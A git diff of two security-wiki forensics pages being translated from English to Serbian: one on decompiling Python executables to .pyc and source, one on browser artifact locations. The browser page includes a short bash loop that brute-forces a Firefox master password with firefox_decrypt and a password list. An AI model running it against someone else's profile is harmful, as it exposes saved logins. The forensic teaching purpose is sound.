-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! - -{% embed url="https://go.intigriti.com/hacktricks" %} - -## From Compiled Binary to .pyc - -From an **ELF** compiled binary you can **get the .pyc** with: +## Od kompajliranog binarnog fajla do .pyc +Iz **ELF** kompajliranog binarnog fajla možete **dobiti .pyc** sa: ```bash pyi-archive_viewer # The list of python modules will be given here: [(0, 230, 311, 1, 'm', 'struct'), - (230, 1061, 1792, 1, 'm', 'pyimod01_os_path'), - (1291, 4071, 8907, 1, 'm', 'pyimod02_archive'), - (5362, 5609, 13152, 1, 'm', 'pyimod03_importers'), - (10971, 1473, 3468, 1, 'm', 'pyimod04_ctypes'), - (12444, 816, 1372, 1, 's', 'pyiboot01_bootstrap'), - (13260, 696, 1053, 1, 's', 'pyi_rth_pkgutil'), - (13956, 1134, 2075, 1, 's', 'pyi_rth_multiprocessing'), - (15090, 445, 672, 1, 's', 'pyi_rth_inspect'), - (15535, 2514, 4421, 1, 's', 'binary_name'), +(230, 1061, 1792, 1, 'm', 'pyimod01_os_path'), +(1291, 4071, 8907, 1, 'm', 'pyimod02_archive'), +(5362, 5609, 13152, 1, 'm', 'pyimod03_importers'), +(10971, 1473, 3468, 1, 'm', 'pyimod04_ctypes'), +(12444, 816, 1372, 1, 's', 'pyiboot01_bootstrap'), +(13260, 696, 1053, 1, 's', 'pyi_rth_pkgutil'), +(13956, 1134, 2075, 1, 's', 'pyi_rth_multiprocessing'), +(15090, 445, 672, 1, 's', 'pyi_rth_inspect'), +(15535, 2514, 4421, 1, 's', 'binary_name'), ... ? X binary_name to filename? 
/tmp/binary.pyc ``` - -In a **python exe binary** compiled you can **get the .pyc** by running: - +U **python exe binarnom** kompajliranom možete **dobiti .pyc** pokretanjem: ```bash python pyinstxtractor.py executable.exe ``` +## Od .pyc do python koda -## From .pyc to python code - -For the **.pyc** data ("compiled" python) you should start trying to **extract** the **original** **python** **code**: - +Za **.pyc** podatke ("kompilirani" python) trebali biste početi pokušavati da **izvučete** **originalni** **python** **kod**: ```bash uncompyle6 binary.pyc > decompiled.py ``` +**Budite sigurni** da binarni fajl ima **ekstenziju** "**.pyc**" (ako ne, uncompyle6 neće raditi) -**Be sure** that the binary has the **extension** "**.pyc**" (if not, uncompyle6 is not going to work) - -While executing **uncompyle6** you might find the **following errors**: - -### Error: Unknown magic number 227 +Tokom izvršavanja **uncompyle6** mogli biste naići na **sledeće greške**: +### Greška: Nepoznat magični broj 227 ```bash /kali/.local/bin/uncompyle6 /tmp/binary.pyc Unknown magic number 227 in /tmp/binary.pyc ``` +Da biste to popravili, potrebno je da **dodate ispravan magični broj** na početku generisanog fajla. -To fix this you need to **add the correct magic number** at the beginning of the generated file. 
- -**Magic numbers vary with the python version**, to get the magic number of **python 3.8** you will need to **open a python 3.8** terminal and execute: - +**Magični brojevi se razlikuju u zavisnosti od verzije pythona**, da biste dobili magični broj za **python 3.8**, potrebno je da **otvorite python 3.8** terminal i izvršite: ``` >> import imp >> imp.get_magic().hex() '550d0d0a' ``` +**Magični broj** u ovom slučaju za python3.8 je **`0x550d0d0a`**, zatim, da biste ispravili ovu grešku, moraćete da **dodate** na **početak** **.pyc datoteke** sledeće bajtove: `0x0d550a0d000000000000000000000000` -The **magic number** in this case for python3.8 is **`0x550d0d0a`**, then, to fix this error you will need to **add** at the **beginning** of the **.pyc file** the following bytes: `0x0d550a0d000000000000000000000000` - -**Once** you have **added** that magic header, the **error should be fixed.** - -This is how a correctly added **.pyc python3.8 magic header** will look like: +**Jednom** kada ste **dodali** taj magični zaglavlje, **greška bi trebala biti ispravljena.** +Ovako će izgledati ispravno dodato **.pyc python3.8 magično zaglavlje**: ```bash hexdump 'binary.pyc' | head 0000000 0d55 0a0d 0000 0000 0000 0000 0000 0000 
@@ -79,25 +63,23 @@ hexdump 'binary.pyc' | head 0000020 0700 0000 4000 0000 7300 0132 0000 0064 0000030 0164 006c 005a 0064 0164 016c 015a 0064 ``` +### Greška: Decompiling generic errors -### Error: Decompiling generic errors +**Druge greške** kao što su: `class 'AssertionError'>; co_code should be one of the types (, , , ); is type ` mogu se pojaviti. -**Other errors** like: `class 'AssertionError'>; co_code should be one of the types (, , , ); is type ` may appear. +To verovatno znači da **niste ispravno dodali** magični broj ili da niste **koristili** **ispravan magični broj**, pa se **pobrinite da koristite ispravan** (ili pokušajte novi). -This probably means that you **haven't added correctly** the magic number or that you haven't **used** the **correct magic number**, so make **sure you use the correct one** (or try a new one). +Proverite dokumentaciju o prethodnim greškama. -Check the previous error documentation. +## Automatski alat -## Automatic Tool +[**python-exe-unpacker alat**](https://github.com/countercept/python-exe-unpacker) služi kao kombinacija nekoliko alata dostupnih u zajednici, dizajniranih da pomognu istraživačima u raspakivanju i decompiling izvršnih datoteka napisanih u Pythonu, posebno onih kreiranih sa py2exe i pyinstaller. Uključuje YARA pravila za identifikaciju da li je izvršna datoteka zasnovana na Pythonu i potvrđuje alat za kreiranje. -The [**python-exe-unpacker tool**](https://github.com/countercept/python-exe-unpacker) serves as a combination of several community-available tools designed to assist researchers in unpacking and decompiling executables written in Python, specifically those created with py2exe and pyinstaller. It includes YARA rules to identify if an executable is Python-based and confirms the creation tool. 
+### ImportError: Ime datoteke: 'unpacked/malware_3.exe/**pycache**/archive.cpython-35.pyc' ne postoji -### ImportError: File name: 'unpacked/malware_3.exe/**pycache**/archive.cpython-35.pyc' doesn't exist - -A common issue encountered involves an incomplete Python bytecode file resulting from the **unpacking process with unpy2exe or pyinstxtractor**, which then **fails to be recognized by uncompyle6 due to a missing Python bytecode version number**. To address this, a prepend option has been added, which appends the necessary Python bytecode version number, facilitating the decompiling process. - -Example of the issue: +Uobičajen problem koji se javlja uključuje nepotpunu Python bytecode datoteku koja je rezultat **procesa raspakivanja sa unpy2exe ili pyinstxtractor**, koja zatim **ne može biti prepoznata od strane uncompyle6 zbog nedostatka broja verzije Python bytecode-a**. Da bi se to rešilo, dodata je opcija za preklapanje, koja dodaje neophodan broj verzije Python bytecode-a, olakšavajući proces decompiling-a. +Primer problema: ```python # Error when attempting to decompile without the prepend option test@test: uncompyle6 unpacked/malware_3.exe/archive.py 
@@ -115,11 +97,9 @@ test@test:python python_exe_unpack.py -p unpacked/malware_3.exe/archive # Successfully decompiled file [+] Successfully decompiled. ``` +## Analiza python asemblera -## Analyzing python assembly - -If you weren't able to extract the python "original" code following the previous steps, then you can try to **extract** the **assembly** (but i**t isn't very descriptive**, so **try** to extract **again** the original code).In [here](https://bits.theorem.co/protecting-a-python-codebase/) I found a very simple code to **disassemble** the _.pyc_ binary (good luck understanding the code flow). If the _.pyc_ is from python2, use python2: - +Ako niste mogli da izvučete "originalni" python kod prateći prethodne korake, možete pokušati da **izvučete** **asembler** (ali **nije baš opisno**, pa **pokušajte** ponovo da izvučete originalni kod). U [ovde](https://bits.theorem.co/protecting-a-python-codebase/) sam pronašao vrlo jednostavan kod za **dezintegraciju** _.pyc_ binarnog fajla (srećno sa razumevanjem toka koda). Ako je _.pyc_ iz python2, koristite python2: ```bash >>> import dis >>> import marshal 
@@ -145,34 +125,32 @@ True >>> >>> # Disassemble the code object >>> dis.disassemble(code) - 1 0 LOAD_CONST 0 () - 3 MAKE_FUNCTION 0 - 6 STORE_NAME 0 (hello_world) - 9 LOAD_CONST 1 (None) - 12 RETURN_VALUE +1 0 LOAD_CONST 0 () +3 MAKE_FUNCTION 0 +6 STORE_NAME 0 (hello_world) +9 LOAD_CONST 1 (None) +12 RETURN_VALUE >>> >>> # Also disassemble that const being loaded (our function) >>> dis.disassemble(code.co_consts[0]) - 2 0 LOAD_CONST 1 ('Hello {0}') - 3 LOAD_ATTR 0 (format) - 6 LOAD_FAST 0 (name) - 9 CALL_FUNCTION 1 - 12 PRINT_ITEM - 13 PRINT_NEWLINE - 14 LOAD_CONST 0 (None) - 17 RETURN_VALUE +2 0 LOAD_CONST 1 ('Hello {0}') +3 LOAD_ATTR 0 (format) +6 LOAD_FAST 0 (name) +9 CALL_FUNCTION 1 +12 PRINT_ITEM +13 PRINT_NEWLINE +14 LOAD_CONST 0 (None) +17 RETURN_VALUE ``` +## Python u izvršni fajl -## Python to Executable +Da počnemo, pokažaćemo vam kako se payloadi mogu kompajlirati u py2exe i PyInstaller. -To start, we’re going to show you how payloads can be compiled in py2exe and PyInstaller. - -### To create a payload using py2exe: - -1. Install the py2exe package from [http://www.py2exe.org/](http://www.py2exe.org) -2. For the payload (in this case, we will name it hello.py), use a script like the one in Figure 1. The option “bundle_files” with the value of 1 will bundle everything including the Python interpreter into one exe. -3. Once the script is ready, we will issue the command “python setup.py py2exe”. This will create the executable, just like in Figure 2. +### Da kreirate payload koristeći py2exe: +1. Instalirajte py2exe paket sa [http://www.py2exe.org/](http://www.py2exe.org) +2. Za payload (u ovom slučaju, nazvaćemo ga hello.py), koristite skriptu kao što je prikazano na Slici 1. Opcija “bundle_files” sa vrednošću 1 će sve spojiti, uključujući Python interpreter, u jedan exe. +3. Kada je skripta spremna, izdaćemo komandu “python setup.py py2exe”. Ovo će kreirati izvršni fajl, baš kao na Slici 2. 
```python from distutils.core import setup import py2exe, sys, os @@ -180,10 +158,10 @@ import py2exe, sys, os sys.argv.append('py2exe') setup( - options = {'py2exe': {'bundle_files': 1}}, - #windows = [{'script': "hello.py"}], - console = [{'script': "hello.py"}], - zipfile = None, +options = {'py2exe': {'bundle_files': 1}}, +#windows = [{'script': "hello.py"}], +console = [{'script': "hello.py"}], +zipfile = None, ) ``` @@ -200,12 +178,10 @@ running py2exe copying C:\Python27\lib\site-packages\py2exe\run.exe -> C:\Users\test\Desktop\test\dist\hello.exe Adding python27.dll as resource to C:\Users\test\Desktop\test\dist\hello.exe ``` +### Da biste kreirali payload koristeći PyInstaller: -### To create a payload using PyInstaller: - -1. Install PyInstaller using pip (pip install pyinstaller). -2. After that, we will issue the command “pyinstaller –onefile hello.py” (a reminder that ‘hello.py’ is our payload). This will bundle everything into one executable. - +1. Instalirajte PyInstaller koristeći pip (pip install pyinstaller). +2. Nakon toga, izdaćemo komandu “pyinstaller –onefile hello.py” (podsećanje da je ‘hello.py’ naš payload). Ovo će sve spojiti u jedan izvršni fajl. ``` C:\Users\test\Desktop\test>pyinstaller --onefile hello.py 108 INFO: PyInstaller: 3.3.1 @@ -218,15 +194,9 @@ C:\Users\test\Desktop\test>pyinstaller --onefile hello.py 5982 INFO: Appending archive to EXE C:\Users\test\Desktop\test\dist\hello.exe 6325 INFO: Building EXE from out00-EXE.toc completed successfully. ``` - -## References +## Reference - [https://blog.f-secure.com/how-to-decompile-any-python-binary/](https://blog.f-secure.com/how-to-decompile-any-python-binary/) -
- -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! - -{% embed url="https://go.intigriti.com/hacktricks" %} {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md index 76fa3ef23..df3900540 100644 --- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md +++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md @@ -1,6 +1,6 @@ {{#include ../../../banners/hacktricks-training.md}} -Here you can find interesting tricks for specific file-types and/or software: +Ovde možete pronaći zanimljive trikove za specifične tipove fajlova i/ili softver: {{#ref}} .pyc.md diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md index ba35ea1fd..d8a221d6d 100644 --- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md +++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md @@ -2,138 +2,128 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - ## Browsers Artifacts -Browser artifacts include various types of data stored by web browsers, such as navigation history, bookmarks, and cache data. These artifacts are kept in specific folders within the operating system, differing in location and name across browsers, yet generally storing similar data types. +Browser artifacts uključuju različite tipove podataka koje čuvaju web pregledači, kao što su istorija navigacije, obeleživači i podaci iz keša. Ovi artefakti se čuvaju u specifičnim folderima unutar operativnog sistema, koji se razlikuju po lokaciji i imenu među pregledačima, ali generalno čuvaju slične tipove podataka. -Here's a summary of the most common browser artifacts: +Evo sažetak najčešćih browser artefakata: -- **Navigation History**: Tracks user visits to websites, useful for identifying visits to malicious sites. -- **Autocomplete Data**: Suggestions based on frequent searches, offering insights when combined with navigation history. -- **Bookmarks**: Sites saved by the user for quick access. -- **Extensions and Add-ons**: Browser extensions or add-ons installed by the user. -- **Cache**: Stores web content (e.g., images, JavaScript files) to improve website loading times, valuable for forensic analysis. -- **Logins**: Stored login credentials. -- **Favicons**: Icons associated with websites, appearing in tabs and bookmarks, useful for additional information on user visits. -- **Browser Sessions**: Data related to open browser sessions. -- **Downloads**: Records of files downloaded through the browser. -- **Form Data**: Information entered in web forms, saved for future autofill suggestions. 
-- **Thumbnails**: Preview images of websites. -- **Custom Dictionary.txt**: Words added by the user to the browser's dictionary. +- **Navigacija Istorija**: Prati posete korisnika web sajtovima, korisno za identifikaciju poseta zlonamernim sajtovima. +- **Podaci za Autocomplete**: Predlozi zasnovani na čestim pretragama, nude uvid kada se kombinuju sa istorijom navigacije. +- **Obeleživači**: Sajtovi koje je korisnik sačuvao za brzi pristup. +- **Ekstenzije i Dodaci**: Ekstenzije ili dodaci pregledača koje je instalirao korisnik. +- **Keš**: Čuva web sadržaj (npr. slike, JavaScript datoteke) kako bi poboljšao vreme učitavanja sajtova, vredno za forenzičku analizu. +- **Prijave**: Sačuvane prijavne informacije. +- **Favicons**: Ikone povezane sa web sajtovima, koje se pojavljuju u karticama i obeleživačima, korisne za dodatne informacije o posetama korisnika. +- **Sesije Pregledača**: Podaci vezani za otvorene sesije pregledača. +- **Preuzimanja**: Zapisnici datoteka preuzetih putem pregledača. +- **Podaci iz Formi**: Informacije unesene u web forme, sačuvane za buduće predloge za automatsko popunjavanje. +- **Sličice**: Pregledne slike web sajtova. +- **Custom Dictionary.txt**: Reči koje je korisnik dodao rečniku pregledača. ## Firefox -Firefox organizes user data within profiles, stored in specific locations based on the operating system: +Firefox organizuje korisničke podatke unutar profila, koji se čuvaju na specifičnim lokacijama u zavisnosti od operativnog sistema: - **Linux**: `~/.mozilla/firefox/` - **MacOS**: `/Users/$USER/Library/Application Support/Firefox/Profiles/` - **Windows**: `%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\` -A `profiles.ini` file within these directories lists the user profiles. Each profile's data is stored in a folder named in the `Path` variable within `profiles.ini`, located in the same directory as `profiles.ini` itself. If a profile's folder is missing, it may have been deleted. 
+Datoteka `profiles.ini` unutar ovih direktorijuma sadrži listu korisničkih profila. Podaci svakog profila se čuvaju u folderu nazvanom u `Path` varijabli unutar `profiles.ini`, koji se nalazi u istom direktorijumu kao i `profiles.ini`. Ako nedostaje folder profila, možda je obrisan. -Within each profile folder, you can find several important files: +Unutar svakog foldera profila možete pronaći nekoliko važnih datoteka: -- **places.sqlite**: Stores history, bookmarks, and downloads. Tools like [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) on Windows can access the history data. - - Use specific SQL queries to extract history and downloads information. -- **bookmarkbackups**: Contains backups of bookmarks. -- **formhistory.sqlite**: Stores web form data. -- **handlers.json**: Manages protocol handlers. -- **persdict.dat**: Custom dictionary words. -- **addons.json** and **extensions.sqlite**: Information on installed add-ons and extensions. -- **cookies.sqlite**: Cookie storage, with [MZCookiesView](https://www.nirsoft.net/utils/mzcv.html) available for inspection on Windows. -- **cache2/entries** or **startupCache**: Cache data, accessible through tools like [MozillaCacheView](https://www.nirsoft.net/utils/mozilla_cache_viewer.html). -- **favicons.sqlite**: Stores favicons. -- **prefs.js**: User settings and preferences. -- **downloads.sqlite**: Older downloads database, now integrated into places.sqlite. -- **thumbnails**: Website thumbnails. -- **logins.json**: Encrypted login information. -- **key4.db** or **key3.db**: Stores encryption keys for securing sensitive information. +- **places.sqlite**: Čuva istoriju, obeleživače i preuzimanja. Alati poput [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) na Windows-u mogu pristupiti podacima o istoriji. +- Koristite specifične SQL upite za ekstrakciju informacija o istoriji i preuzimanjima. +- **bookmarkbackups**: Sadrži rezervne kopije obeleživača. 
+- **formhistory.sqlite**: Čuva podatke iz web formi. +- **handlers.json**: Upravljanje protokolima. +- **persdict.dat**: Reči iz prilagođenog rečnika. +- **addons.json** i **extensions.sqlite**: Informacije o instaliranim dodacima i ekstenzijama. +- **cookies.sqlite**: Skladištenje kolačića, uz [MZCookiesView](https://www.nirsoft.net/utils/mzcv.html) dostupno za inspekciju na Windows-u. +- **cache2/entries** ili **startupCache**: Podaci iz keša, dostupni putem alata kao što je [MozillaCacheView](https://www.nirsoft.net/utils/mozilla_cache_viewer.html). +- **favicons.sqlite**: Čuva favicone. +- **prefs.js**: Korisničke postavke i preferencije. +- **downloads.sqlite**: Starija baza podataka preuzimanja, sada integrisana u places.sqlite. +- **thumbnails**: Sličice web sajtova. +- **logins.json**: Enkriptovane prijavne informacije. +- **key4.db** ili **key3.db**: Čuva ključeve za enkripciju radi zaštite osetljivih informacija. -Additionally, checking the browser’s anti-phishing settings can be done by searching for `browser.safebrowsing` entries in `prefs.js`, indicating whether safe browsing features are enabled or disabled. - -To try to decrypt the master password, you can use [https://github.com/unode/firefox_decrypt](https://github.com/unode/firefox_decrypt)\ -With the following script and call you can specify a password file to brute force: +Pored toga, proveru podešavanja pregledača za zaštitu od phishing-a možete izvršiti pretraživanjem `browser.safebrowsing` unosa u `prefs.js`, što ukazuje na to da li su funkcije sigurne navigacije omogućene ili onemogućene. 
+Da biste pokušali da dekriptujete glavnu lozinku, možete koristiti [https://github.com/unode/firefox_decrypt](https://github.com/unode/firefox_decrypt)\ +Sa sledećim skriptom i pozivom možete odrediti datoteku lozinki za brute force: ```bash:brute.sh #!/bin/bash #./brute.sh top-passwords.txt 2>/dev/null | grep -A2 -B2 "chrome:" passfile=$1 while read pass; do - echo "Trying $pass" - echo "$pass" | python firefox_decrypt.py +echo "Trying $pass" +echo "$pass" | python firefox_decrypt.py done < $passfile ``` - ![](<../../../images/image (417).png>) ## Google Chrome -Google Chrome stores user profiles in specific locations based on the operating system: +Google Chrome čuva korisničke profile na specifičnim lokacijama u zavisnosti od operativnog sistema: - **Linux**: `~/.config/google-chrome/` - **Windows**: `C:\Users\XXX\AppData\Local\Google\Chrome\User Data\` - **MacOS**: `/Users/$USER/Library/Application Support/Google/Chrome/` -Within these directories, most user data can be found in the **Default/** or **ChromeDefaultData/** folders. The following files hold significant data: +Unutar ovih direktorijuma, većina korisničkih podataka može se naći u **Default/** ili **ChromeDefaultData/** folderima. Sledeće datoteke sadrže značajne podatke: -- **History**: Contains URLs, downloads, and search keywords. On Windows, [ChromeHistoryView](https://www.nirsoft.net/utils/chrome_history_view.html) can be used to read the history. The "Transition Type" column has various meanings, including user clicks on links, typed URLs, form submissions, and page reloads. -- **Cookies**: Stores cookies. For inspection, [ChromeCookiesView](https://www.nirsoft.net/utils/chrome_cookies_view.html) is available. -- **Cache**: Holds cached data. To inspect, Windows users can utilize [ChromeCacheView](https://www.nirsoft.net/utils/chrome_cache_view.html). -- **Bookmarks**: User bookmarks. -- **Web Data**: Contains form history. -- **Favicons**: Stores website favicons. 
-- **Login Data**: Includes login credentials like usernames and passwords. -- **Current Session**/**Current Tabs**: Data about the current browsing session and open tabs. -- **Last Session**/**Last Tabs**: Information about the sites active during the last session before Chrome was closed. -- **Extensions**: Directories for browser extensions and addons. -- **Thumbnails**: Stores website thumbnails. -- **Preferences**: A file rich in information, including settings for plugins, extensions, pop-ups, notifications, and more. -- **Browser’s built-in anti-phishing**: To check if anti-phishing and malware protection are enabled, run `grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences`. Look for `{"enabled: true,"}` in the output. +- **History**: Sadrži URL-ove, preuzimanja i ključne reči za pretragu. Na Windows-u, [ChromeHistoryView](https://www.nirsoft.net/utils/chrome_history_view.html) može se koristiti za čitanje istorije. Kolona "Transition Type" ima različita značenja, uključujući klikove korisnika na linkove, otkucane URL-ove, slanje obrazaca i ponovna učitavanja stranica. +- **Cookies**: Čuva kolačiće. Za inspekciju, dostupna je [ChromeCookiesView](https://www.nirsoft.net/utils/chrome_cookies_view.html). +- **Cache**: Drži keširane podatke. Da bi se izvršila inspekcija, korisnici Windows-a mogu koristiti [ChromeCacheView](https://www.nirsoft.net/utils/chrome_cache_view.html). +- **Bookmarks**: Korisnički obeleživači. +- **Web Data**: Sadrži istoriju obrazaca. +- **Favicons**: Čuva favicon-e sajtova. +- **Login Data**: Uključuje podatke za prijavu kao što su korisnička imena i lozinke. +- **Current Session**/**Current Tabs**: Podaci o trenutnoj sesiji pretraživanja i otvorenim karticama. +- **Last Session**/**Last Tabs**: Informacije o sajtovima aktivnim tokom poslednje sesije pre nego što je Chrome zatvoren. +- **Extensions**: Direktorijumi za ekstenzije i dodatke pretraživača. +- **Thumbnails**: Čuva sličice sajtova. 
+- **Preferences**: Datoteka bogata informacijama, uključujući podešavanja za dodatke, ekstenzije, iskačuće prozore, obaveštenja i još mnogo toga. +- **Browser’s built-in anti-phishing**: Da biste proverili da li su zaštita od prevara i zaštita od malvera omogućene, pokrenite `grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences`. Potražite `{"enabled: true,"}` u izlazu. ## **SQLite DB Data Recovery** -As you can observe in the previous sections, both Chrome and Firefox use **SQLite** databases to store the data. It's possible to **recover deleted entries using the tool** [**sqlparse**](https://github.com/padfoot999/sqlparse) **or** [**sqlparse_gui**](https://github.com/mdegrazia/SQLite-Deleted-Records-Parser/releases). +Kao što možete primetiti u prethodnim sekcijama, i Chrome i Firefox koriste **SQLite** baze podataka za čuvanje podataka. Moguće je **oporaviti obrisane unose koristeći alat** [**sqlparse**](https://github.com/padfoot999/sqlparse) **ili** [**sqlparse_gui**](https://github.com/mdegrazia/SQLite-Deleted-Records-Parser/releases). ## **Internet Explorer 11** -Internet Explorer 11 manages its data and metadata across various locations, aiding in separating stored information and its corresponding details for easy access and management. +Internet Explorer 11 upravlja svojim podacima i metapodacima na različitim lokacijama, pomažući u razdvajanju sačuvanih informacija i njihovih odgovarajućih detalja za lak pristup i upravljanje. ### Metadata Storage -Metadata for Internet Explorer is stored in `%userprofile%\Appdata\Local\Microsoft\Windows\WebCache\WebcacheVX.data` (with VX being V01, V16, or V24). Accompanying this, the `V01.log` file might show modification time discrepancies with `WebcacheVX.data`, indicating a need for repair using `esentutl /r V01 /d`. 
This metadata, housed in an ESE database, can be recovered and inspected using tools like photorec and [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html), respectively. Within the **Containers** table, one can discern the specific tables or containers where each data segment is stored, including cache details for other Microsoft tools such as Skype. +Metapodaci za Internet Explorer čuvaju se u `%userprofile%\Appdata\Local\Microsoft\Windows\WebCache\WebcacheVX.data` (gde je VX V01, V16 ili V24). Uz to, datoteka `V01.log` može pokazati razlike u vremenu modifikacije sa `WebcacheVX.data`, što ukazuje na potrebu za popravkom koristeći `esentutl /r V01 /d`. Ovi metapodaci, smešteni u ESE bazi podataka, mogu se oporaviti i inspekciji pomoću alata kao što su photorec i [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html). Unutar **Containers** tabele, može se uočiti specifične tabele ili kontejneri gde je svaki segment podataka smešten, uključujući detalje o kešu za druge Microsoft alate kao što je Skype. ### Cache Inspection -The [IECacheView](https://www.nirsoft.net/utils/ie_cache_viewer.html) tool allows for cache inspection, requiring the cache data extraction folder location. Metadata for cache includes filename, directory, access count, URL origin, and timestamps indicating cache creation, access, modification, and expiry times. +Alat [IECacheView](https://www.nirsoft.net/utils/ie_cache_viewer.html) omogućava inspekciju keša, zahtevajući lokaciju foldera za ekstrakciju podataka iz keša. Metapodaci za keš uključuju ime datoteke, direktorijum, broj pristupa, URL izvor i vremenske oznake koje označavaju vreme kreiranja, pristupa, modifikacije i isteka keša. ### Cookies Management -Cookies can be explored using [IECookiesView](https://www.nirsoft.net/utils/iecookies.html), with metadata encompassing names, URLs, access counts, and various time-related details. 
Persistent cookies are stored in `%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies`, with session cookies residing in memory. +Kolačići se mogu istraživati koristeći [IECookiesView](https://www.nirsoft.net/utils/iecookies.html), sa metapodacima koji obuhvataju imena, URL-ove, brojeve pristupa i razne vremenske detalje. Trajni kolačići se čuvaju u `%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies`, dok se sesijski kolačići nalaze u memoriji. ### Download Details -Downloads metadata is accessible via [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html), with specific containers holding data like URL, file type, and download location. Physical files can be found under `%userprofile%\Appdata\Roaming\Microsoft\Windows\IEDownloadHistory`. +Metapodaci o preuzimanjima su dostupni putem [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html), sa specifičnim kontejnerima koji sadrže podatke kao što su URL, tip datoteke i lokacija preuzimanja. Fizičke datoteke se mogu naći pod `%userprofile%\Appdata\Roaming\Microsoft\Windows\IEDownloadHistory`. ### Browsing History -To review browsing history, [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) can be used, requiring the location of extracted history files and configuration for Internet Explorer. Metadata here includes modification and access times, along with access counts. History files are located in `%userprofile%\Appdata\Local\Microsoft\Windows\History`. +Da biste pregledali istoriju pretraživanja, može se koristiti [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html), zahtevajući lokaciju ekstraktovanih datoteka istorije i konfiguraciju za Internet Explorer. Metapodaci ovde uključuju vremena modifikacije i pristupa, zajedno sa brojevima pristupa. Datoteke istorije se nalaze u `%userprofile%\Appdata\Local\Microsoft\Windows\History`. 
### Typed URLs -Typed URLs and their usage timings are stored within the registry under `NTUSER.DAT` at `Software\Microsoft\InternetExplorer\TypedURLs` and `Software\Microsoft\InternetExplorer\TypedURLsTime`, tracking the last 50 URLs entered by the user and their last input times. +Otucani URL-ovi i njihova vremena korišćenja čuvaju se unutar registra pod `NTUSER.DAT` na `Software\Microsoft\InternetExplorer\TypedURLs` i `Software\Microsoft\InternetExplorer\TypedURLsTime`, prateći poslednjih 50 URL-ova koje je korisnik uneo i njihova poslednja vremena unosa. ## Microsoft Edge -Microsoft Edge stores user data in `%userprofile%\Appdata\Local\Packages`. The paths for various data types are: +Microsoft Edge čuva korisničke podatke u `%userprofile%\Appdata\Local\Packages`. Putanje za različite tipove podataka su: - **Profile Path**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC` - **History, Cookies, and Downloads**: `C:\Users\XX\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat` 
@@ -143,24 +133,24 @@ Microsoft Edge stores user data in `%userprofile%\Appdata\Local\Packages`. The p ## Safari -Safari data is stored at `/Users/$User/Library/Safari`. Key files include: +Safari podaci se čuvaju na `/Users/$User/Library/Safari`. Ključne datoteke uključuju: -- **History.db**: Contains `history_visits` and `history_items` tables with URLs and visit timestamps. Use `sqlite3` to query. -- **Downloads.plist**: Information about downloaded files. -- **Bookmarks.plist**: Stores bookmarked URLs. -- **TopSites.plist**: Most frequently visited sites. -- **Extensions.plist**: List of Safari browser extensions. Use `plutil` or `pluginkit` to retrieve. -- **UserNotificationPermissions.plist**: Domains permitted to push notifications. Use `plutil` to parse. -- **LastSession.plist**: Tabs from the last session. Use `plutil` to parse. -- **Browser’s built-in anti-phishing**: Check using `defaults read com.apple.Safari WarnAboutFraudulentWebsites`. A response of 1 indicates the feature is active. +- **History.db**: Sadrži tabele `history_visits` i `history_items` sa URL-ovima i vremenskim oznakama poseta. Koristite `sqlite3` za upite. +- **Downloads.plist**: Informacije o preuzetim datotekama. +- **Bookmarks.plist**: Čuva obeležene URL-ove. +- **TopSites.plist**: Najčešće posećeni sajtovi. +- **Extensions.plist**: Lista ekstenzija pretraživača Safari. Koristite `plutil` ili `pluginkit` za preuzimanje. +- **UserNotificationPermissions.plist**: Domeni kojima je dozvoljeno slanje obaveštenja. Koristite `plutil` za analizu. +- **LastSession.plist**: Kartice iz poslednje sesije. Koristite `plutil` za analizu. +- **Browser’s built-in anti-phishing**: Proverite koristeći `defaults read com.apple.Safari WarnAboutFraudulentWebsites`. Odgovor 1 označava da je funkcija aktivna. ## Opera -Opera's data resides in `/Users/$USER/Library/Application Support/com.operasoftware.Opera` and shares Chrome's format for history and downloads. 
